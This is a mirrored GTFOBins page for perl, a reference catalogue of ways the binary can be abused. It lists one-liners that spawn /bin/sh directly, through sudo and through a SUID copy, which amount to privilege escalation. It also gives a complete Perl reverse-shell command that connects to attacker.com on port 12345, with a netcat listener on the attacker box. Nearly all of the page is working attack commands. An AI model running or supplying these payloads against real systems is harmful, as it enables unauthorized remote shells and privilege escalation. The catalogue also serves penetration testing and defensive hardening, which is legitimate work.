1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-10 02:11:53 +01:00
GTFOBins.github.io/_gtfobins/perl.md
2018-05-25 15:30:02 +02:00

617 B

functions
execute-interactive sudo-enabled suid-enabled reverse-shell-interactive
code
perl -e 'exec "/bin/sh";'
code
sudo perl -e 'exec "/bin/sh";'
code
./perl -e 'exec "/bin/sh";'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'